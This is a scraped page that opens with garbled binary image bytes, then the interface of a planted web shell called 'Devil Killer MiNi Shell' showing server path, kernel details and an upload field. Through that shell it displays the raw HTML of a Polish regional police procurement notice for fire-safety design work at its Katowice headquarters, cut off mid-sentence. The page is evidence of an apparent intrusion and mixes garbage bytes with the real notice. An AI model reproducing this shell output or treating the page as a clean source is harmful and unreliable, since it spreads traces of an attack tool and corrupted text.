JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241126/0061496501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> KWP w Katowicach – modernizacja budynków A, B i C - KWP w Katowicach przy ul. Lompy 19 - I etap - przystosowanie do przepisów przeciwpożarowych – opracowanie dokumentacji projektowo - kosztorysowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KWP w Katowicach – modernizacja budynków A, B i C - KWP w Katowicach przy ul. Lompy 19 - I etap - przystosowanie do przepisów przeciwpożarowych – opracowanie dokumentacji projektowo - kosztorysowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c556900e-0933-4e67-b320-35c8631645be</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00614965</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00244141/52/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 KWP Katowice - modernizacja budynków A, B, C w Katowicach przy ul. Lompy 19 - I etap - przystosowanie do przepisów przeciwpożarowych - opracowanie dokumentacji projektowo - kosztorysowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. 2020 r. poz. 2452 z póżn. zm.), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na https://slaska-policja.eb2b.com.pl tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>f) Dopuszczalny format przesyłanych danych tj. plików o wielkości do 50 MB w formatach: .pdf<br/>g) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, jest w Systemie zaszyfrowany. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>h) Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas<br/>(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”.<br/>6. Instrukcja korzystania z Platformy, tj.:<br/>a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu. Po wprowadzeniu danych użytkownika tj. adresu e-<br/>mail oraz hasła zgłoszenie jest automatycznie akceptowane przez system;<br/>b) w zakładce „Postępowania”, „Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając z polecenia<br/>„zgłoś się do udziału w postępowaniu” przejść do Formularza rejestracyjnego – w przypadku, gdy Wykonawca nie posiada konta na<br/>Platformie lub panelu logowania użytkownika do Systemu;<br/>c) po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e-maila informującego, że może dokonać pierwszego logowania<br/>do Platformy;<br/>d) W sytuacji problematycznej proszę kontaktować się z obsługą platformy.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z zasadami korzystania z https://slaska-<br/>policja.eb2b.com.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Pytania/Informacje”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>ustawy.<br/>8. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z<br/>09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych.<br/>a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg).<br/>b) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z<br/>c) Zamawiający informuje, że oferta złożona z wykorzystaniem kompresji plików z rozszerzeniem „rar: nie zostanie odrzucona.<br/>Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z prowadzonym postępowaniem<br/>udziela Operator Platformy Zakupowej pod numerem telEfonu (+48) 22 378 39 70, (+48) 22 258 48 61, (+48) 22 428 19 28, e-mail: helpdesk@eb2b.com.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji w<br/>Katowicach z siedzibą przy ul. J. Lompy 19, 40-038 Katowice; 2. Inspektor Ochrony Danych wykonuje swoje obowiązki w siedzibie<br/>Komendy Wojewódzkiej Policji w Katowicach, zlokalizowanej w Katowicach przy ul. J. Lompy 19, tel. 47-851-24-03, e-mail:<br/>iod.kwp@ka.policja.gov.pl; 3. Pani/Pana dane osobowe będą przetwarzane w celu/ celach przygotowania i przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego oraz realizacji tego zamówienia; 4. Podstawą prawną przetwarzania<br/>Ogłoszenie nr 2024/BZP 00518547/01 z dnia 2024-09-26<br/>2024-09-26 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>dotyczących Pani/Pana danych osobowych jest ustawa z dnia 11 września 2019r. Prawo zamówień publicznych(Dz.U.<br/>2022r.poz.1710), zwana w dalszej części „ustawą Pzp”; 5. Odbiorcą Pani/Pana danych osobowych może być Urząd Zamówień<br/>Publicznych, ponadto w zakresie określonym w ustawie Pzp, dane mogą być publikowane na stronie internetowej<br/>http://bip.katowice.kwp.policja.gov.pl oraz innym podmiotom uprawnionym na podstawie odrębnych przepisów; 6.Pani/Pana dane nie<br/>będą przekazywane do państwa trzeciego, organizacji międzynarodowej; 7. Okres przechowywania Pani/Pana danych osobowych<br/>wynika z przepisów dotyczących okresów przechowywania akt w Policji. 8. Posiada Pani/Pan prawo<br/>żądania od Administratora dostępu do danych dotyczących Pani/Pana osoby, sprostowania, ograniczenia przetwarzania i wniesienia<br/>sprzeciwu wobec przetwarzania danych osobowych w zakresie określonym przepisami prawa; 9. Ma Pani/Pan prawo wniesienia<br/>skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych; 10. Podanie danych jest<br/>wymogiem ustawowym; 11.W przypadku niepodania danych nie będzie możliwy udział w postępowaniu o udzielenie zamówienia<br/>publicznego; 12.Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym<br/>profilowaniu; 13.Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych<br/>osobowych i Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO).<br/>Obowiązek poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych<br/>spoczywa na Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec<br/>osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie<br/>złożone w załączniku nr 1 do SWZ – formularz ofertowy.<br/>1.	Klauzula informacyjna dla uczestników postępowań o zamówienie publiczne jest dostępna pod adresem https://slaska.bip.policja.gov.pl/KWK/rodo/wydzial-zamowien-publicznych/44266,Wydzial-Zamowien-Publicznych.html</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-598/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie inwentaryzacji budowlanej całkowitej oraz kompletnej dokumentacji<br/>projektowo – kosztorysowej zadania inwestycyjnego pn. „KWP w Katowicach – modernizacja budynków A, B i C - KWP w<br/>Katowicach przy ul. Lompy 19 - I etap - przystosowanie do przepisów przeciwpożarowych – opracowanie dokumentacji<br/>projektowo - kosztorysowej”.<br/>Dokumentacja projektowo – kosztorysowa wykonana w ramach niniejszego zamówienia powinna być zgodna z ustawą<br/>Prawo Budowlane i zaopatrzona w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że jest wykonana zgodnie z<br/>obowiązującymi przepisami oraz normami i że zostaje wydana w stanie kompletnym z punktu widzenia celu, któremu ma<br/>służyć.<br/>2. Przedmiotem niniejszego zamówienia jest m.in.:<br/>Opracowania na które składa się dokumentacja:<br/>• inwentaryzacja budowlana całkowita, inwentaryzacja instalacji elektrycznych, teletechnicznych, sanitarnych;<br/>• projekt budowlany w zrozumieniu Rozporządzenia Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego<br/>zakresu i formy projektu budowlanego (Dz. U. z 2022 r., poz. 1679 z późn. zm.), Rozporządzeniem Ministra Rozwoju i<br/>Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji<br/>technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2021 poz. 2454 z<br/>późn. zm.) – 5 egz. w wersji papierowej + 5 egz. na płycie CD (ilość opracowań uwzględniając decyzję o pozwoleniu na<br/>budowę);<br/>• projekt wykonawczy wielobranżowy w zrozumieniu Rozporządzenia Ministra Rozwoju i Technologii z dnia 20 grudnia 2021<br/>r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót<br/>budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2021 poz. 2454 z późn. zm.) – 5 egz. w wersji papierowej + 5<br/>egz. na płycie CD;<br/>• kosztorys inwestorski – 5 egz. w wersji papierowej + 5 egz. na płycie CD;<br/>• przedmiar robót – 5 egz. w wersji papierowej + 5 egz. na płycie CD;<br/>• specyfikacje techniczne wykonania i odbioru robót budowlanych – 5 egz. w wersji papierowej + 5 egz. na płycie CD.<br/>Na płytach CD należy przygotować:<br/>• część rysunkową dokumentacji projektowej w formacie „.PDF” oraz „.DWG”;<br/>• kosztorysy inwestorskie, przedmiary robót w formacie „.PDF” oraz „.ATH”;<br/>• Specyfikację Techniczną Wykonania i Odbioru Robót oraz opisy do dokumentacji w wersji „.PDF” oraz „.DOC”.<br/>3. Lokalizacja przedmiotu zamówienia Komenda Wojewódzka Policji w Katowicach ul. Lompy 19, 40-038 Katowice.<br/>4. Szczegółowe informacje dotyczące przedmiotu zamówienia Zamawiający opisał w załączniku nr 3 do SWZ – Opis<br/>Przedmiotu Zamówienia.<br/>5. Wspólny Słownik Zamówień (CPV):<br/>71221003-3 Usługi Architektoniczne w zakresie obiektów budowlanych.<br/>71320000-7 Usługi inżynieryjne w zakresie projektowania.<br/>Szczegółowy opis zamówienia sformułowano w SWZ oraz załącznikach do niej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród ofert niepodlegających odrzuceniu na<br/>podstawie kryterium:<br/>a. cena oferty brutto – 60 %<br/>b. okres gwarancji na dok. proj. - koszt. - 40 %<br/>2. Sposób oceny ofert. Oceniane będą tylko oferty niepodlegające odrzuceniu - ważne według następującego wzoru i punktacji<br/>Y=A+B<br/>gdzie:<br/>Y - Suma punktów badanej ważnej oferty<br/>A - cena oferty brutto - 60%, co odpowiada 60 pkt<br/>B - wydłużenie okresu gwarancji na dokumentację projektowo-kosztorysową - 40 %, co odpowiada 40 pkt<br/>co daje łącznie maksymalnie 100 pkt.<br/>O wyborze najkorzystniejszej oferty zadecyduje najwyższa ilość punktów uzyskanych łącznie za wszystkie kryteria.<br/>2.1. kryterium A - cena oferty brutto Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w ofertach do ceny<br/>najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>A=(C min)/(C bad) x 60 pkt<br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>C min - najniższa cena oferty brutto<br/>C bad - cena brutto badanej oferty<br/>Wyznaczenie wartości punktów: Sekcja XX SWZ.<br/>2.2. kryterium B – wydłużenie okresu gwarancji na dokumentację projektowo - kosztorysową. Ocena będzie dokonywana poprzez<br/>porównanie o ile miesięcy został wydłużony minimalny okres gwarancji w badanej ofercie do najbardziej wydłużonego okresu<br/>gwarancji na roboty budowlane spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>B=(G bad)/(G max) x 40 pkt<br/>gdzie:<br/>B - ilość pkt uzyskanych przez Wykonawcę<br/>G bad – przedłużenie okresu gwarancji oferty badanej (w miesiącach)<br/>G max – największe przedłużenie okresu gwarancji (w miesiącach) do maksymalnego poziomu tj. 48 miesiące.<br/>Wyznaczenie wartości punktów - Sekcja XX SWZ.<br/>Szczegółowe informacje dot. opisu kryteriów i oceny ofert Zamawiający sformułował w Sekcji XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji na dokumentację projektowo-kosztorysową</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej<br/>Zamawiający będzie dokonywał oceny zdolności technicznej lub zawodowej wykonawcy na podstawie minimalnych<br/>warunków dotyczących doświadczenia i kwalifikacji zawodowych zarówno samych wykonawców, jak i osób skierowanych<br/>przez wykonawcę do realizacji zamówienia.<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący doświadczenia, jeżeli w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej<br/>dwie dokumentacje projektowe wielobranżowe w zakresie przebudowy budynków użyteczności publicznej, które<br/>obejmowały swoim zakresem również przebudowę instalacji p.poż. w tym systemów wentylacji pożarowej, na kwotę co<br/>najmniej 200.0000,00 zł. netto każda.<br/>Zamawiający uzna, że wykonawca spełnia warunek dotyczący kwalifikacji zawodowych, jeżeli Wykonawca dysponuje<br/>i skieruje do realizacji zamówienia:<br/>a) osobę posiadającą uprawnienia do projektowania w specjalności architektonicznej bez ograniczeń i wpisaną na listę<br/>członków izby samorządu zawodowego;<br/>b) osobę posiadającą uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń i wpisaną na<br/>listę członków izby samorządu zawodowego;<br/>c) osobę posiadającą uprawnienia do projektowania w specjalności sanitarnej bez ograniczeń i wpisaną na listę członków<br/>izby samorządu zawodowego.<br/>d) posiadającą uprawnienia do projektowania w specjalności elektrycznej bez ograniczeń i wpisaną na listę członków izby<br/>samorządu zawodowego.<br/>e) osobę posiadającą uprawnienia do projektowania w specjalności telekomunikacyjnej bez ograniczeń i wpisaną na listę<br/>członków izby samorządu zawodowego.<br/>f) Koordynatora w zakresie realizacji przedmiotu umowy posiadającego uprawnienia do projektowania w specjalności<br/>konstrukcyjno-budowlanej bez ograniczeń i wpisanego na listę członków izby samorządu zawodowego.<br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania 